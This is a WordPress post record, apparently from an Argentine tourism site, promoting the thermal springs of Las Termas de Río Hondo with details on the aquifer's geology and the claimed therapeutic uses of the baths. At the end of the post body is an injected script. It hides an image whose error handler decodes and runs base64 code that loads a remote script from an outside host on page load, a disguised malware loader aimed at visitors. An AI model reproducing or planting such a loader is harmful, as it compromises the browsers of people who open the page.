{"id":7243,"date":"2023-08-23T12:30:28","date_gmt":"2023-08-23T15:30:28","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=7243"},"modified":"2025-08-13T15:55:08","modified_gmt":"2025-08-13T18:55:08","slug":"porque-rio-hondo-es-el-destino-icono-del-termalismo-en-argentina","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=7243","title":{"rendered":"Rio Hondo es el destino icono del termalismo en argentina"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#075b8c\"> <em>Primero, porque es la capital nacional del turismo termal<\/em><\/h3>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-large is-resized\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/unnamed-2-scaled.jpg\"><img decoding=\"async\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/unnamed-2-1024x405.jpg\" alt=\"\" class=\"wp-image-7186\" width=\"297\" height=\"117\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/unnamed-2-1024x405.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/unnamed-2-300x119.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/unnamed-2-768x303.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/unnamed-2-1536x607.jpg 1536w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/unnamed-2-2048x809.jpg 2048w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/unnamed-2-696x275.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/unnamed-2-1068x422.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/unnamed-2-1063x420.jpg 1063w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/unnamed-2-320x126.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/unnamed-2-480x190.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/unnamed-2-800x316.jpg 800w\" sizes=\"(max-width: 297px) 100vw, 297px\" \/><\/a><figcaption class=\"wp-element-caption\">                        <em><sup><mark class=\"has-inline-color has-vivid-cyan-blue-color\"><mark>Publicidad:<\/mark><\/mark><\/sup><\/em><\/figcaption><\/figure>\n<\/div>\n\n\n<p>El 18 de Septiembre de 2.014 las Comisiones de Turismo y de Legislaci\u00f3n General consideraron el proyecto de Ley de los se\u00f1ores diputados Oliva, J. A. Herrera y M. H. Ju\u00e1rez, y de las se\u00f1oras diputadas Navarro, Abdala de Matarazzo, Ru\u00edz y Pastoriza, por el que se declara \u201cCapital Nacional del Termalismo\u201d a la ciudad de Las Termas de R\u00edo Hondo. Se tuvo en cuenta que la ciudad de Las Termas de R\u00edo Hondo cuenta con el acu\u00edfero de aguas termales m\u00e1s importante de nuestro pa\u00eds, tanto por la superficie que abarca como por la cantidad de las mismas. La ciudad se encuentra asentada \u00edntegramente sobre napas de aguas termominerales, convirti\u00e9ndola en un verdadero Spa a cielo abierto, y esto hace que expertos estudiosos en la materia las denominen como las termas m\u00e1s importantes del mundo.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><em>Detalles y or\u00edgenes de sus aguas<\/em><\/h3>\n\n\n\n<p>Las Termas de R\u00edo Hondo se asienta sobre una vasta cuenca artesiana cuyas aguas mete\u00f3ricas surgen a la superficie en forma de vertientes y manantiales.<\/p>\n\n\n\n<p>En el faldeo oriental de la sierra del Aconquija (Tucum\u00e1n) las lluvias sonabundantes y sobrepasan los 1.500 mm de promedio anual y es precisamente en donde se localiza la zona de recarga (\u00e1rea de m\u00e1xima infiltraci\u00f3n). A partir de ese punto se engendra el desplazamiento subterr\u00e1neo de una gran masa de agua que se traslada desde el poniente hacia el naciente y llega incluso a la sierra de Guasay\u00e1n en Santiago del Estero). Esta barrera natural, constituye un obst\u00e1culo para el movimiento de las aguas subterr\u00e1neas y es la encargada de generar elevadas presiones de surgencia en el complejo hidrotermal y al estar asociada con importantes temperaturas provenientes de una c\u00e1mara magm\u00e1tica localizada en profundidad, se genera una zona de surgencia natural en el sistema acu\u00edfero multicapas (Mart\u00edn, A., 20%)<\/p>\n\n\n\n<p>Se puede decir que el subsuelo de la mayor parte de la ciudad est\u00e1 constituido por acu\u00edferos surgentes, cuyo basamento hidrogeol\u00f3gico lo constituyen las arcillas verdes de origen marino denominada formaci\u00f3n Paran\u00e1, las cuales tapizan una profunda cuenca sedimentaria en hundimiento y la conformaci\u00f3n de esa cuenca hidrotermal son los siguientes:<\/p>\n\n\n\n<p>a) existencia de una fuente de calor (foco magm\u00e1tico) que se encuentra en profundidad,<\/p>\n\n\n\n<p>b) presencia de formaciones geol\u00f3gicas muy permeables que cumplen las funciones de un gran reservorio y permitan la circulaci\u00f3n del agua por convecci\u00f3n forzada a trav\u00e9s de las arcillas y limos que constituyen los miembros improductivos,<\/p>\n\n\n\n<p>c) presencia de una zona de recarga que estar\u00eda insertada en el faldeo oriental de la sierra del Aconquija (provincia de Tucum\u00e1n) y<\/p>\n\n\n\n<p>d) existencia de formaciones geol\u00f3gicas como las arcillas verdes que act\u00faen como piso impermeable y cierran herm\u00e9ticamente el sistema, de tal manera que no permiten la fuga del agua hacia los niveles inferiores.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/0_20230209151214.jpg\"><img decoding=\"async\" width=\"780\" height=\"320\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/0_20230209151214.jpg\" alt=\"\" class=\"wp-image-7244\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/0_20230209151214.jpg 780w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/0_20230209151214-300x123.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/0_20230209151214-768x315.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/0_20230209151214-696x286.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/0_20230209151214-320x131.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/0_20230209151214-480x197.jpg 480w\" sizes=\"(max-width: 780px) 100vw, 780px\" \/><\/a><figcaption class=\"wp-element-caption\"><em><sub>Croquis circulaci\u00f3n del agua a nivel del regional.<\/sub><\/em><\/figcaption><\/figure>\n<\/div>\n\n\n<p>Con un entramado urbano de 12 km<sup>2<\/sup>de extensi\u00f3n, en la ciudad se encuentra una densa red de perforaciones cuyo n\u00famero superar\u00eda las 10.000, utiz\u00e1ndose con fines tanto de explotaci\u00f3n para el turismo termal como para el abastecimiento de agua en viviendas particulares. Estas poseen profundidades diversas que van desde los 50 a 300 metros, en su mayor\u00eda con temperaturas en perforaciones hoteleras entre 40 a 60 \u00b0C. Existen sin embargo algunas perforaciones hechas con fines exploratorios por la Direcci\u00f3n General de Geolog\u00eda y Minas, que superan ampliamente estos valores de temperatura. Un ejemplo de esto, lo representa la perforaci\u00f3n N\u00b012, del a\u00f1o 1951, actualmente en desuso, que ronda los 800 metros de profundidad y con una temperatura en boca de pozo de 78 \u00b0C.<\/p>\n\n\n\n<p><em>Una caracter\u00edstica destacable es que todas las viviendas y hoteles, de cualquier categor\u00eda, est\u00e1n dotados de agua termomineral. Todos los hoteles poseen ba\u00f1o privado donde el turista puede realizar la balneaci\u00f3n con aguas mineromedicinales<\/em><\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><em>\u00bfCu\u00e1les son sus beneficios a la hora de disfrutar de las aguas?<\/em><\/h3>\n\n\n\n<p>En Las Termas de R\u00edo Hondo se realizan perforaciones a distintas profundidades y en consecuencia con diferentes caracter\u00edsticas en su composici\u00f3n f\u00edsico-qu\u00edmica, lo que permite que el turista que nos visita, pueda disponer de diferentes tipos de agua con una variada composici\u00f3n mineral\u00f3gica, a\u00fan en un mismo establecimiento, particularidad que no se repite en otros centros termales. Estas son calientes, alcalinas, bicarbonatadas, cloruradas, sulfatadas, d\u00e9bilmente ferruginosas (con poco hierro) y d\u00e9bilmente mineralizadas.<\/p>\n\n\n\n<p>El predominio que se observa en el agua de la ciudad es la presencia de carbonatos alcalinos en relaci\u00f3n con los bicarbonatos y la temperatura de las aguas, lo que explica la saponificaci\u00f3n perfecta de la materia grasa de la piel, la que produce ese estado de suavidad y aterciopelamiento de la piel despu\u00e9s de un ba\u00f1o termal.<\/p>\n\n\n\n<p>La principal aplicaci\u00f3n del agua de Las Termas de R\u00edo Hondo es en la forma de ba\u00f1o, debido que su composici\u00f3n fisicoqu\u00edmica tiene todas las aplicaciones que la experiencia secular ha indicado, especialmente sobre el aparato locomotor y la piel.<\/p>\n\n\n\n<p>Con respecto a la acci\u00f3n que ejercen sobre la piel en los ba\u00f1os de inmersi\u00f3n, diremos que sus componentes minerales pueden atravesar la barrera cut\u00e1nea en cantidades muy peque\u00f1as. La piel absorbe en forma selectiva ciertas sustancias activas de las aguas del ba\u00f1o y las deja pasar como a trav\u00e9s de un filtro.<\/p>\n\n\n\n<p><strong><em>La Cura Balnearia<\/em><\/strong><\/p>\n\n\n\n<p>La cura balnearia se refiere a la suma integral de factores que act\u00faan sobre el individuo en un centro termal.&nbsp;<\/p>\n\n\n\n<p>En nuestra ciudad encontramos muchos factores ben\u00e9ficos que se suman a los ba\u00f1os termales en s\u00ed: el clima benigno con una temperatura media anual 21\u00b0C en invierno, la tranquilidad del lugar y el disfrute de actividades al aire libre, lo que le permite al visitante conectarse con un entorno termal que lo libera de las circunstancias estresantes de su vida cotidiana.<\/p>\n\n\n\n<p><strong><em>La Cura Mineromedicinal<\/em><\/strong><\/p>\n\n\n\n<p>Las aguas termales tienen un rol de importancia en la medicina preventiva y restitutiva o complementaria, como todo medicamento debe conocerse sus indicaciones, contraindicaciones, dosis, horario, etc. y poder ajustarse con responsabilidad a las prescripciones.&nbsp;<\/p>\n\n\n\n<p>El paciente antes de su traslado a un centro termal debe consultar su m\u00e9dico de cabecera en busca de una revisa\u00adci\u00f3n general; Se recomienda no tomar ba\u00f1os termales el d\u00eda de llegada, principalmente luego de un viaje agotador. Se recomienda descansar, adaptarse paulatinamente al lugar y consultar un personal id\u00f3neo qui\u00e9n le indicar\u00e1 los ba\u00f1os en forma personalizada.&nbsp;<\/p>\n\n\n\n<p>Los ba\u00f1os deben ser tomados en forma racional y opor\u00adtuna, con la frecuencia adecuada (1, 2 o 3 ba\u00f1os diarios seg\u00fan lo indique el profesional), aunque en general se indican dos ba\u00f1os diarios.&nbsp;<\/p>\n\n\n\n<p>Los ba\u00f1os termales est\u00e1n indicados en una serie de afec\u00adciones como ser:&nbsp;<\/p>\n\n\n\n<p>artrosis, artritis reumatoidea cr\u00f3nica, gota, contracturas musculares por estr\u00e9s, neuralgias, ci\u00e1tica, atrofia muscu\u00adlar, secuelas de par\u00e1lisis muscular o disminuci\u00f3n de la actividad muscular. En afecciones de la piel como psoria\u00adsis, eccemas con prurito, afecciones descamativas de la piel y en personas nerviosas que expresan a trav\u00e9s del cuerpo problemas emocionales.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><em>A todo esto, el destino cuenta con un Centro M\u00e9dico de Orientaci\u00f3n Termal<\/em><\/h3>\n\n\n\n<p>Ubicado en el parque Mart\u00edn Miguel de G\u00fcemes, el Centro M\u00e9dico de Orientaci\u00f3n Termal utiliza las aguas termales en terapias neurol\u00f3gicas, antirreum\u00e1ticas, circulatorias, dermatol\u00f3gicas y de est\u00e9tica y belleza. Las mismas han sido reconocidas por la Organizaci\u00f3n Mundial de la Salud.<\/p>\n\n\n\n<p>El Centro dispone de consultas m\u00e9dicas iniciales y evolutivas: tratamientos con agua mineromedicinal: ba\u00f1os de inmersi\u00f3n; gimnasia y kinesioterapia subacu\u00e1tica; masajes; mecano y fangoterap\u00eda; gimnasia terap\u00e9utica.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><em>La Olla, lugar p\u00fablico para disfrutar a plenitud las bondades de sus aguas<\/em> <\/h3>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-large is-resized\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/IMG_20230302_203923-scaled.jpg\"><img decoding=\"async\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/IMG_20230302_203923-1024x578.jpg\" alt=\"\" class=\"wp-image-7245\" width=\"382\" height=\"215\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/IMG_20230302_203923-1024x578.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/IMG_20230302_203923-300x169.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/IMG_20230302_203923-768x433.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/IMG_20230302_203923-1536x867.jpg 1536w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/IMG_20230302_203923-2048x1156.jpg 2048w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/IMG_20230302_203923-696x393.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/IMG_20230302_203923-1068x603.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/IMG_20230302_203923-744x420.jpg 744w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/IMG_20230302_203923-320x181.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/IMG_20230302_203923-480x271.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/IMG_20230302_203923-800x452.jpg 800w\" sizes=\"(max-width: 382px) 100vw, 382px\" \/><\/a><\/figure>\n<\/div>\n\n\n<p>Pileta recreativa de uso p\u00fablico ubicada al aire libre en el Balneario Municipal y Av. Costanera, para regocijarse l\u00fadicamente de las aguas termales, absorber sus beneficios y encontrar en ellas el placer y la plenitud. Juegos para ni\u00f1os, mesas y asadores complementan el espacio.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><em>Ba\u00f1os Termales, p\u00fablicos y de excelentes servicios<\/em><\/h3>\n\n\n\n<p>Los Ba\u00f1os P\u00fablicos son un espacio p\u00fablico emblem\u00e1tico que le dio vida a la ciudad con el turismo termal, el Intendente Municipal Arq. Miguel Roberto Mukdise (mandato cumplido), inaugur\u00f3 la obra de remodelaci\u00f3n y refuncionalizaci\u00f3n del paseo y la plaza \u00abClara Navarro\u00bb de los \u00abBa\u00f1os termales\u00bb.<\/p>\n\n\n\n<p>Este es un paseo p\u00fablico hist\u00f3rico que se encontraba deteriorado por el paso de los a\u00f1os y la falta de mantenimiento, fue uno de los lugares m\u00e1s concurridos por los turistas que arribaban al destino tur\u00edstico a buscar mejorar la calidad de su salud por el beneficio curativo de las aguas termales.<\/p>\n\n\n\n<p>Los tradicionales ba\u00f1os termales cuentan con diferentes y modernos conceptos en termalismo y terapias termales destinadas a mejorar la salud y calidad de vida de quienes tomen los ba\u00f1os termomineromedicinales en las instalaciones de este flamante complejo termal.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/www.termasderiohondo.tur.ar\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" width=\"1024\" height=\"250\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/Captura-web_23-8-2023_114215_www.termasderiohondo.tur_.ar_-1024x250.jpeg\" alt=\"\" class=\"wp-image-7246\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/Captura-web_23-8-2023_114215_www.termasderiohondo.tur_.ar_-1024x250.jpeg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/Captura-web_23-8-2023_114215_www.termasderiohondo.tur_.ar_-300x73.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/Captura-web_23-8-2023_114215_www.termasderiohondo.tur_.ar_-768x188.jpeg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/Captura-web_23-8-2023_114215_www.termasderiohondo.tur_.ar_-1536x376.jpeg 1536w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/Captura-web_23-8-2023_114215_www.termasderiohondo.tur_.ar_-696x170.jpeg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/Captura-web_23-8-2023_114215_www.termasderiohondo.tur_.ar_-1068x261.jpeg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/Captura-web_23-8-2023_114215_www.termasderiohondo.tur_.ar_-1718x420.jpeg 1718w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/Captura-web_23-8-2023_114215_www.termasderiohondo.tur_.ar_-320x78.jpeg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/Captura-web_23-8-2023_114215_www.termasderiohondo.tur_.ar_-480x117.jpeg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/Captura-web_23-8-2023_114215_www.termasderiohondo.tur_.ar_-800x196.jpeg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/Captura-web_23-8-2023_114215_www.termasderiohondo.tur_.ar_.jpeg 1722w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><figcaption class=\"wp-element-caption\">Para m\u00e1s datos ingrese <em>aqu\u00ed<\/em>: <\/figcaption><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Primero, porque es la capital nacional del turismo termal El 18 de Septiembre de 2.014 las Comisiones de Turismo y de Legislaci\u00f3n General consideraron el proyecto de Ley de los se\u00f1ores diputados Oliva, J. A. Herrera y M. H. Ju\u00e1rez, y de las se\u00f1oras diputadas Navarro, Abdala de Matarazzo, Ru\u00edz y Pastoriza, por el que [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":7249,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[8,17],"tags":[],"class_list":["post-7243","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-noa","category-turismo-termal"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7243","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7243"}],"version-history":[{"count":5,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7243\/revisions"}],"predecessor-version":[{"id":10328,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7243\/revisions\/10328"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/7249"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7243"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7243"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7243"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}